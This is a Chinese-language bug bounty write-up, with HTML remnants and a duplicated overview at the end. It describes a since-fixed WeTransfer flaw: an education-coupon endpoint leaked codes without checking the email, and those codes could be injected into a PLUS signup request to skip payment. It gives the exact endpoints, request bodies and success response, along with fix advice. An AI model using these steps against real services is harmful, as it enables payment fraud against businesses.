WeTransfer PLUS会员免费获取漏洞分析报告<\/h1>

漏洞概述<\/h2>
本报告详细分析了WeTransfer平台存在的一个安全漏洞，该漏洞允许攻击者通过构造特定请求，绕过正常支付流程，免费获取价值€120欧元的PLUS会员资格。漏洞涉及优惠券验证码泄露和请求构造不当等问题。<\/p>

目标系统介绍<\/h2>

WeTransfer是荷兰一个基于云端的文件传输服务，主要特点包括：<\/p>

免费用户限制：最大传输2GB文件，保存时间两周<\/li>
PLUS会员特权：更大传输容量（15GB）等，年费€120<\/li>

特色功能：无需注册、个性化上传设置、自动病毒扫描等<\/li> <\/ul>

漏洞发现过程<\/h2>

初始探索<\/h3>

发现WeTransfer有针对.edu邮箱的教育优惠：高校学生可免费获取一年PLUS会员<\/li>

测试使用伪造的.edu邮箱(

testttsttststst7@mail.edu<\/code>)注册教育优惠<\/li>
<\/ol>
关键发现<\/h3>
在发送教育优惠申请请求时：<\/p>
POST<\/span> \/api\/ui\/education\/coupons HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> wetransfer.com<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>{"email":<\/span>"testttsttststst7@mail.edu"}<\/span>
<\/span><\/span><\/code><\/pre>服务器响应中直接返回了优惠券代码：<\/p>
{
<\/span><\/span>  "code"<\/span>: "9e0bca0a6d92"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞本质<\/strong>：服务器本应通过邮件发送验证码，却在HTTP响应中直接泄露，且未对邮箱真实性进行验证。<\/p>
漏洞利用方法<\/h2>
步骤1：获取优惠券代码<\/h3>

向\/api\/ui\/education\/coupons<\/code>发送POST请求<\/li>
使用任意伪造的.edu邮箱地址<\/li>
从响应中提取优惠券代码<\/li>
<\/ol>
步骤2：构造会员注册请求<\/h3>

访问正常PLUS会员注册页面：https:\/\/wetransfer.com\/plus<\/code><\/li>
选择"Annual subscription"选项<\/li>
填写个人信息并拦截请求<\/li>
<\/ol>
原始请求示例：<\/p>
POST<\/span> \/api\/ui\/users HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> wetransfer.com<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>{<\/span>
<\/span><\/span>  "country_code"<\/span>:<\/span> "..."<\/span>,<\/span>
<\/span><\/span>  "vat_number"<\/span>:<\/span> "..."<\/span>,<\/span>
<\/span><\/span>  "street_and_number"<\/span>:<\/span> "..."<\/span>,<\/span>
<\/span><\/span>  ...其他注册信息...<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>步骤3：注入优惠券代码<\/h3>
在原始请求中添加"coupon_code":"获取的优惠码"<\/code>字段：<\/p>
{
<\/span><\/span>  "country_code"<\/span>: "..."<\/span>,
<\/span><\/span>  "vat_number"<\/span>: "..."<\/span>,
<\/span><\/span>  "street_and_number"<\/span>: "..."<\/span>,
<\/span><\/span>  "coupon_code"<\/span>: "5a9fa8cc51c3"<\/span>,
<\/span><\/span>  ...其他注册信息...<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>步骤4：验证利用成功<\/h3>
成功响应特征：<\/p>
{
<\/span><\/span>  "order_completed"<\/span>: {
<\/span><\/span>    "successful"<\/span>: true<\/span>,
<\/span><\/span>    "free"<\/span>: true<\/span>
<\/span><\/span>  },
<\/span><\/span>  "redirect_to_url"<\/span>: "http:\/\/wetransfer.com\/payment\/completed?duration=year"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞原理分析<\/h2>


优惠券生成机制缺陷<\/strong>：<\/p>

教育优惠码生成后直接返回给客户端<\/li>
未验证邮箱真实性或建立邮箱与优惠码的绑定关系<\/li>
<\/ul>
<\/li>

优惠券验证缺陷<\/strong>：<\/p>

优惠码可被用于任何账户注册<\/li>
服务器未检查优惠码的获取途径和使用条件<\/li>
<\/ul>
<\/li>

业务逻辑漏洞<\/strong>：<\/p>

教育优惠流程与普通注册流程存在接口共用<\/li>
权限控制不严格，允许未经验证的优惠码使用<\/li>
<\/ul>
<\/li>
<\/ol>
修复建议<\/h2>

优惠券生成后应立即与请求邮箱绑定，仅通过邮件发送<\/li>
增加优惠券使用条件验证：

验证优惠券获取邮箱与使用邮箱一致性<\/li>
验证优惠券类型与使用场景匹配<\/li>
<\/ul>
<\/li>
分离教育优惠与普通注册的API接口<\/li>
实施优惠券使用频率限制<\/li>
<\/ol>
时间线<\/h2>

2018.3.24：漏洞初报<\/li>
2018.3.25：WeTransfer响应<\/li>
2018.5.15：漏洞修复<\/li>
最终奖励：€500欧元<\/li>
<\/ul>
总结<\/h2>
本案例展示了业务逻辑漏洞的典型利用方式，攻击者通过分析正常业务流程，发现接口响应信息泄露和验证缺失问题，最终实现权限提升。开发人员应特别注意敏感信息（如验证码）的传输方式，并确保业务逻辑的完整验证。<\/p>

WeTransfer PLUS会员免费获取漏洞分析报告<\/h1>

漏洞概述<\/h2> 本报告详细分析了WeTransfer平台存在的一个安全漏洞，该漏洞允许攻击者通过构造特定请求，绕过正常支付流程，免费获取价值€120欧元的PLUS会员资格。漏洞涉及优惠券验证码泄露和请求构造不当等问题。<\/p>

漏洞发现过程<\/h2>

漏洞概述<\/h2>
本报告详细分析了WeTransfer平台存在的一个安全漏洞，该漏洞允许攻击者通过构造特定请求，绕过正常支付流程，免费获取价值€120欧元的PLUS会员资格。漏洞涉及优惠券验证码泄露和请求构造不当等问题。<\/p>